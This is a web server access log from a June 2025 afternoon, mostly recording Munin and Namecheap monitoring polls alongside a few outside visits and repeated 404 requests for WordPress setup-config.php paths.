127.0.0.1 - - [15/Jun/2025:17:00:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1358 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [15/Jun/2025:17:00:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:00:31 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [15/Jun/2025:17:01:52 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:02:01 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:03:12 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:17:04:39 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [15/Jun/2025:17:04:51 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:04:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:05:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41327 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:05:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:05:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:05:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:05:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
2a06:98c0:3600::103 - - [15/Jun/2025:17:05:10 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
127.0.0.1 - - [15/Jun/2025:17:05:54 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [15/Jun/2025:17:06:03 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
43.135.182.43 - - [15/Jun/2025:17:06:12 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2a06:98c0:3600::103 - - [15/Jun/2025:17:06:14 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:17:06:59 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [15/Jun/2025:17:07:51 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:07:58 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:08:53 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
204.76.203.219 - - [15/Jun/2025:17:09:25 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.152 - - [15/Jun/2025:17:09:58 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
127.0.0.1 - - [15/Jun/2025:17:10:01 +0000] "GET /whm-server-status HTTP/1.0" 200 42833 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:10:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1442 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:10:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1444 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:10:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:10:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1444 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [15/Jun/2025:17:10:50 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:10:57 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:11:14 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [15/Jun/2025:17:11:44 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:13:50 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:13:55 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:14:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:15:01 +0000] "GET /whm-server-status HTTP/1.0" 200 42247 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:15:01 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1442 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:15:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1442 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:15:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:15:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1441 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [15/Jun/2025:17:16:49 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:16:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:17:01 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [15/Jun/2025:17:17:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:19:49 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:19:53 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:20:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41828 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:20:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1441 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:20:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1441 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:20:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:20:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1442 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [15/Jun/2025:17:20:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:22:48 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:22:51 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:23:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:25:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41378 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:25:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:25:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1444 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:25:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:25:05 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:25:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1444 "-" "munin/2.0.73 (libwww-perl/6.67)"
2a06:98c0:3600::103 - - [15/Jun/2025:17:25:35 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [15/Jun/2025:17:25:50 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:25:56 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:26:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:17:27:02 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:17:27:48 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [15/Jun/2025:17:28:48 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:28:56 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:17:28:56 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [15/Jun/2025:17:29:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:30:01 +0000] "GET /whm-server-status HTTP/1.0" 200 42763 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:30:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1443 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:30:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1441 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:30:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:30:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1443 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:30:16 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
43.163.105.166 - - [15/Jun/2025:17:30:23 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.54.118.134 - - [15/Jun/2025:17:31:47 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:31:55 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:32:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:34:47 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:34:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:35:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41467 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:35:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1443 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:35:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1444 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:35:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:35:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:35:32 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [15/Jun/2025:17:35:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:37:47 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:37:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:38:52 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:40:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41316 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:40:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:40:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:40:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:40:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.54.118.134 - - [15/Jun/2025:17:40:47 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:40:53 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:41:40 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [15/Jun/2025:17:41:49 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:43:39 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:43:51 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:44:45 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:45:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41241 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:45:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:45:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:45:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:45:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
2a06:98c0:3600::103 - - [15/Jun/2025:17:45:29 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:17:45:49 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:17:46:28 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [15/Jun/2025:17:46:31 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:46:50 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:47:41 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:17:48:32 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:17:48:52 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
127.0.0.1 - - [15/Jun/2025:17:49:02 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [15/Jun/2025:17:49:23 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:49:48 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:50:02 +0000] "GET /whm-server-status HTTP/1.0" 200 41079 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:50:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1444 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:50:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1444 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:50:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:50:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [15/Jun/2025:17:50:37 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:52:15 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:52:46 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:53:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:54:02 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:55:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40933 "-" "-"
127.0.0.1 - - [15/Jun/2025:17:55:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:17:55:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:17:55:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:17:55:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.54.118.134 - - [15/Jun/2025:17:55:08 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:55:44 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:17:56:30 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:17:58:00 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:17:58:42 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:17:59:25 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [15/Jun/2025:17:59:26 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:00:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40951 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:00:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:00:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:00:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:00:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.54.118.134 - - [15/Jun/2025:18:00:52 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:01:41 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:02:22 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:03:44 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
119.28.105.107 - - [15/Jun/2025:18:04:28 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
127.0.0.1 - - [15/Jun/2025:18:04:38 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [15/Jun/2025:18:04:39 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:05:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41328 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:05:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:05:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:05:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:05:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1441 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [15/Jun/2025:18:05:18 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
43.135.182.95 - - [15/Jun/2025:18:05:49 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.118.134 - - [15/Jun/2025:18:06:37 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:18:07:07 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [15/Jun/2025:18:07:37 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:18:07:52 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:18:08:07 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [15/Jun/2025:18:08:14 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:09:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:18:09:39 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
127.0.0.1 - - [15/Jun/2025:18:10:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41433 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:10:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:10:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:10:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:10:06 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:10:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [15/Jun/2025:18:10:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:11:11 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:11:56 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:18:13:26 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:18:14:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [15/Jun/2025:18:14:49 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:18:15:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40887 "-" "-"
127.0.0.1 - - [15/Jun/2025:18:15:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:15:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:18:15:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:18:15:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:18:15:31 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
